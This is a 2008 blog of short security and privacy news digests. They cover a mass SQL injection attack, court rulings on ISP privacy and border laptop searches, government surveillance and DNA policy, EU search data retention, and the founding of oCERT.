Tuesday, April 29, 2008

Half a Million Microsoft-Powered Sites Hit With SQL Injection

Slashdot posted a link to an article yesterday regarding a recent attack on approximately 500,000 websites via SQL injection that seems to be limited to Microsoft's IIS webserver.

The attack itself injects some malicious JavaScript code into every text field in a database which, in turn, loads another script that can compromise a user's PC.

According to Bill Sisk, Microsoft's Trustworthy Computing Response Communications Manager:
"Anyone believed to have been affected can visit: http://www.microsoft.com/protect/support/default.mspx and should contact the national law enforcement agency in their country. Those in the United States can contact Customer Service and Support at no charge using the PC Safety hotline at 1-866-PCSAFETY. Additionally, customers in the United States should contact their local FBI office or report their situation at: www.ic3.gov."

For details, see WIRED.

Monday, April 28, 2008

Companies To Be Liable For Deals With Online Criminals

Slashdot has a backgrounder on new rules issued by the FTC that require any business that handles private consumer data to check both customers and suppliers against databases of known online criminals. The rules take effect in November and will subject companies that do not comply with the requirement to large fines or jail time.
"The final rules require each financial institution and creditor that holds any consumer account, or other account for which there is a reasonably foreseeable risk of identity theft, to develop and implement an Identity Theft Prevention Program for combating identity theft in connection with new and existing accounts," the FTC says in the rules, which were passed last year.

For details, see darkREADING.

Thursday, April 24, 2008

NJ Supreme Court Rules For Internet Privacy

In a Slashdot posting on Tuesday, it is mentioned that the New Jersey Supreme Court has ruled that ISPs cannot release customer information without a warrant. The ruling trumps the decisions of the US Supreme court which hold that there is no privacy on the internet.

Chief Justice Stuart Rabner said in writing for the court:
"We now hold that citizens have a reasonable expectation of privacy protected by Article I ... of the New Jersey Constitution, in the subscriber information they provide to Internet service providers -- just as New Jersey citizens have a privacy interest in their bank records stored by banks and telephone billing records kept by phone companies."
Read the full story at The Star-Ledger.

Wednesday, April 23, 2008

Laptops Can Be Searched At the Border

In a story flagged by Slashdot, the closely watched search-and-seizure case involving the laptop snagged from Michael Timothy Arnold by two U.S. Customs and Border Patrol officers is being permitted as evidence against Arnold for transporting child pornography across a national border.

U.S. District Court Judge Dean Pregerson had ruled that the evidence on the laptop was inadmissable since electronic storage devices are an extension of our memories and thoughts and thus cannot be legally searched without reasonable suspicion. However, federal prosecutors appealed that ruling by arguing successfully that the law allows searches at the nation's border without reasonable suspicion.
"I think it will surprise people that their laptops are subject to search without any level of suspicion when they get to a border checkpoint," said. Jennifer Chacon, a law professor at the University of California, Davis.
Chacon warns that those carrying laptops with proprietary business information on them should be aware that a government agent has the right to search computers at the border. See dailybreeze.com for full article.

Tuesday, April 22, 2008

Major ISPs Injecting Ads, Vulnerabilities Into Web

In attempting to treat the website traffic on their networks as legal tender, several major internet service providers may be unintentionally exposing their customers to greater risk of online attacks from identity thieves, says the Washington Post.

The practice of serving ad-filled pages when customers unwittingly request a subdomain of a web site that does not exist potentially introduces security threats when the ISP has outsourced the ad-serving process to a third party.

These findings come from IOActive security researcher Dan Kaminsky who found that advertising servers are impersonating hostnames within trademarked domains.
'We have determined that these injected servers are, in fact, vulnerable to cross-site scripting attacks. Since these servers are being injected into your trademarked domains, their vulnerability can be used to attack your users and your sites,' Kaminsky said, identifying EarthLink, Verizon and Qwest among the ISPs."
See Slashdot for more information.

Monday, April 21, 2008

US Government to Have Only 50 Gateways

The US government plans to decrease the approximately 4,000 active internet connections used by its civilian agencies to only 50 highly secure gateways. This move comes in part as a response to the rise in attacks on its networks.
"Most security professionals agreed that the TIC security improvements and similar measures are long overdue. 'We should have done this five years ago, but there wasn't the heart or the will then like there is now,' said Howard Schmidt, a former White House cyber security adviser. 'The timetable is aggressive,' he said, but now there is a sense of urgency behind the program. Small agencies that won't qualify for their own connections under TIC must subcontract their Internet services to larger agencies."
For more information, see Slashdot.

Friday, April 18, 2008

DHS to Begin Collecting DNA of Anyone Arrested

Slashdot says that the AP is reporting that the U.S. will start collecting DNA from every person they arrest. Moreover, with the authorization of Congress, the Fed also plans to collect DNA samples from foreigners who are detained, regardless of whether or not they are being charged.
"Many innocent lives could have been saved had the government began this kind of DNA sampling in the 1990s when the technology to do so first became available," Sen. Jon Kyl, R-Ariz., said.
But the new regulation would mean that the federal government could store DNA samples of people who are not guilty of any crime, says Jesselyn McCurdy, legislative counsel for the American Civil Liberties Union.
"Now innocent people's DNA will be put into this huge CODIS database, and it will be very difficult for them to get it out if they are not charged or convicted of a crime," McCurdy said.
See complete article in Yahoo News.

Thursday, April 17, 2008

The New E-spionage Threat

In a news byte from SANS Institute, BusinessWeek has taken a look at the increasing number of targeted attacks against US government and private industry systems. The specific example is cited of an email message addressed to a Booz Allen Hamilton executive that was a brilliant fake of what seemed a mundane list, supposedly sent by the Pentagon, of weaponry India wanted to buy.

However, an insidious piece of code by the name of Poison Ivy was embedded in the message, designed to extract sensitive data out of the $4 billion consulting firm's computer network. If the recipient of this seemingly innocuous email had clicked on the attachment, his every keystroke would have been reported back to a mysterious address registered through an obscure company headquartered on the banks of the Yangtze River.

For more information, see the article in Businessweek.com.

For China's response to the article and to Business Week, see China's Response.

Wednesday, April 16, 2008

US To Employ Overhead Spying Domestically

Slashdot mentions an article in the Washington Post about the Bush administration's announcement last Friday to start using the nation's most advanced spy technology for domestic purposes.

Homeland Security Secretary Michael Chertoff said that his department will activate their new domestic satellite surveillance office in stages. Sophisticated overhead sensor data will be used for law enforcement once privacy and civil rights concerns are resolved.

Congress last October delayed launch of the DHS office that would coordinate law-enforcement requests for satellite and other technical data and demanded answers to legal questions about the program. The administration supplied answers that some Congress members characterized as inadequate.

See the full article at washingtonpost.com.

Wednesday, April 09, 2008

EU Recommends Slashing Search Data Retention

According to Slashdot, the Article 29 Working Group, a collection of the EU's top minds on data protection and privacy issues, has written a report that recommends that search engines only be allowed to hold onto search data for six months. Google and others have long said that they need to retain data in order to refine search results, prevent click fraud, and launch new services like spell check. The working group however, has concluded that IP addresses could be used to identify individuals, if not by the search engine itself, then by law enforcement or after a subpoena.

Peter Fleischer, Google's Global Privacy Counsel has already responded when he writes
"The findings are another important step in an ongoing dialogue about protecting user privacy onlineā€”a discussion in which Google will continue to be engaged. It's also a debate in which we hope our users will participate,"

Details appear in ars technica.

For full report in .pdf format, see ARTICLE 29 DATA PROTECTION WORKING PARTY.

Tuesday, April 08, 2008

Security Pros Launch Open-Source CERT

Backed by Google, security consulting firm Inverse Path and the Open Source Lab at Oregon State University have created oCERT (Open Source Computer Emergency Response Team), an organization designed to be the place to go for security incident response for open-source projects ( ACM Technews).

The team wants to manage advance vulnerability warnings, coordinate patch release notification, offer resources for analyzing and repairing software flaws, and hold sluggish vendors accountable when security fixes are delayed.

"Small open-source projects often don't have any form of security handling but the same code they manage [is] included by bigger projects and distributions. When there's a compromise, there's no proper coordination and that's not acceptable," says Andrea Barisani, oCERT founder and project coordinator.

An excellent article describing the new CERT appears in eWEEK.COM.

Monday, April 07, 2008

Blocking Steganosonic Data in Phone Calls

Slashdot notes that scientists at FH St. Polten are developing strategies to block out secret data in VoIP and GMS phone calls by modifying background noise as a means of invisibly and inaudibly preventing the attempted transmission of embedded secret data (see Google translation of the original German.) The modifications effectively destroy any hidden messages.

This development hearkens back to a Steganography software product that embeds data directly in an application's executable file without altering its function or filesize. For a description of this software see hydan.